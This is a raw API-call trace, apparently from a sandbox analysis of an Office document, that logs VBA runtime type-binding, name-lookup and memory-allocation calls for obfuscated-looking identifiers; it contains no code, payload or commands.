[0068.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="D_DBZDA") returned 8 [0068.493] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.493] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="D_DBZDA", lHashVal=0x10e580, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.493] IUnknown:Release (This=0x665ba50) returned 0xb [0068.493] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.493] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="D_DBZDA", lHashVal=0x10e580, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.493] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.493] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.493] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="D_DBZDA", lHashVal=0x10e580, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.493] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.493] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.493] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="D_DBZDA", lHashVal=0x10e580, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.493] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba29ba, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="D_DBZDA") returned 8 [0068.493] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="D_DBZDA", lHashVal=0x10e580, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.494] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.494] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba29ba | out: _Dst=0x67c2d40) returned 0x0 [0068.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_D_DBZDA") returned 0x10e904 [0068.494] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_D_DBZDA" | out: _Dst="_B_var_D_DBZDA") returned 0x0 [0068.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_D_DBZDA") returned 15 [0068.494] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.494] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_D_DBZDA", lHashVal=0x10e904, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.494] IUnknown:Release (This=0x665ba50) returned 0xb [0068.494] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.494] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_D_DBZDA", lHashVal=0x10e904, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.494] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.494] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.494] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_D_DBZDA", lHashVal=0x10e904, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.494] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.494] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.494] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_D_DBZDA", lHashVal=0x10e904, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.494] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.494] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.494] IUnknown:Release (This=0x665ba50) returned 0xb [0068.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1e1a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_D_DBZDA") returned 15 [0068.494] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_D_DBZDA", lHashVal=0x10e904, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x44005f00720061, ppTypeComp=0x5a004200000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x44005f00720061, ppTypeComp=0x5a004200000000, pDummy=0x0) returned 0x0 [0068.494] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba29ba | out: _Dst=0x145020) returned 0x0 [0068.494] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fwAGG1D", lHashVal=0x105710, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba29e2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="fwAGG1D") returned 8 [0068.495] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fwAGG1D", lHashVal=0x105710, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba29e2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="fwAGG1D") returned 8 [0068.495] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fwAGG1D", lHashVal=0x105710, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fwAGG1D") returned 0x105710 [0068.495] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="fwAGG1D" | out: _Dst="fwAGG1D") returned 0x0 [0068.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="fwAGG1D") returned 8 [0068.495] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.495] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fwAGG1D", lHashVal=0x105710, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.495] IUnknown:Release (This=0x665ba50) returned 0xb [0068.495] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.495] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fwAGG1D", lHashVal=0x105710, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.495] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.495] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.495] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fwAGG1D", lHashVal=0x105710, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.495] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.495] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.495] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fwAGG1D", lHashVal=0x105710, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.495] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba29e2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="fwAGG1D") returned 8 [0068.495] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fwAGG1D", lHashVal=0x105710, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.495] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.495] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba29e2 | out: _Dst=0x67c2d40) returned 0x0 [0068.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fwAGG1D") returned 0x105a94 [0068.495] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_fwAGG1D" | out: _Dst="_B_var_fwAGG1D") returned 0x0 [0068.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_fwAGG1D") returned 15 [0068.496] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.496] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fwAGG1D", lHashVal=0x105a94, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.496] IUnknown:Release (This=0x665ba50) returned 0xb [0068.496] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.496] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fwAGG1D", lHashVal=0x105a94, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.496] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.496] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.496] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fwAGG1D", lHashVal=0x105a94, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.496] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.496] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.496] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fwAGG1D", lHashVal=0x105a94, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.496] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.496] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.496] IUnknown:Release (This=0x665ba50) returned 0xb [0068.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1e4a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_fwAGG1D") returned 15 [0068.496] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fwAGG1D", lHashVal=0x105a94, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x66005f00720061, ppTypeComp=0x47004700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x66005f00720061, ppTypeComp=0x47004700000000, pDummy=0x0) returned 0x0 [0068.496] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba29e2 | out: _Dst=0x145020) returned 0x0 [0068.496] ITypeComp:RemoteBind (in: This=0x665ba60, szName="L_ACZAAQ", lHashVal=0x10384f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a0a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="L_ACZAAQ") returned 9 [0068.496] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="L_ACZAAQ", lHashVal=0x10384f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a0a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="L_ACZAAQ") returned 9 [0068.496] ITypeComp:RemoteBind (in: This=0x665bd30, szName="L_ACZAAQ", lHashVal=0x10384f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L_ACZAAQ") returned 0x10384f [0068.497] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="L_ACZAAQ" | out: _Dst="L_ACZAAQ") returned 0x0 [0068.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="L_ACZAAQ") returned 9 [0068.497] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.497] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="L_ACZAAQ", lHashVal=0x10384f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.497] IUnknown:Release (This=0x665ba50) returned 0xb [0068.497] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.497] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="L_ACZAAQ", lHashVal=0x10384f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.497] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.497] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.497] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="L_ACZAAQ", lHashVal=0x10384f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.497] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.497] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.497] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="L_ACZAAQ", lHashVal=0x10384f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.497] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a0a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="L_ACZAAQ") returned 9 [0068.497] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="L_ACZAAQ", lHashVal=0x10384f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.497] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.497] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2a0a | out: _Dst=0x67c2d40) returned 0x0 [0068.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_L_ACZAAQ") returned 0x100fd8 [0068.497] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_L_ACZAAQ" | out: _Dst="_B_var_L_ACZAAQ") returned 0x0 [0068.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_L_ACZAAQ") returned 16 [0068.497] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.497] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_L_ACZAAQ", lHashVal=0x100fd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.497] IUnknown:Release (This=0x665ba50) returned 0xb [0068.497] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.497] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_L_ACZAAQ", lHashVal=0x100fd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.497] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.498] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.498] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_L_ACZAAQ", lHashVal=0x100fd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.498] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.498] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.498] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_L_ACZAAQ", lHashVal=0x100fd8, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.498] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.498] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.498] IUnknown:Release (This=0x665ba50) returned 0xb [0068.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1e7a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_L_ACZAAQ") returned 16 [0068.498] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_L_ACZAAQ", lHashVal=0x100fd8, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4c005f00720061, ppTypeComp=0x5a004300000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4c005f00720061, ppTypeComp=0x5a004300000000, pDummy=0x0) returned 0x0 [0068.498] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2a0a | out: _Dst=0x145020) returned 0x0 [0068.498] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.498] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.498] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.498] IUnknown:Release (This=0x665ba50) returned 0xb [0068.498] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.498] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.498] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.498] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.498] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.498] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.499] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.499] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.499] IUnknown:Release (This=0x665ba50) returned 0xb [0068.499] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.499] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.499] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.499] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.499] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.499] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.499] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.499] IUnknown:Release (This=0x665ba50) returned 0xb [0068.499] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.499] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.499] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.499] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.499] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.499] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.499] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.499] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.499] IUnknown:Release (This=0x665ba50) returned 0xb [0068.500] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.500] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.500] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.500] IMalloc:Realloc (This=0x7fefec05380, pv=0x69503b0, cb=0xc0) returned 0x396fa0 [0068.500] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4520000 [0068.500] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.500] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.500] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.501] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.501] IUnknown:Release (This=0x665ba50) returned 0xb [0068.501] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.501] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.501] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.501] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.501] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.501] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 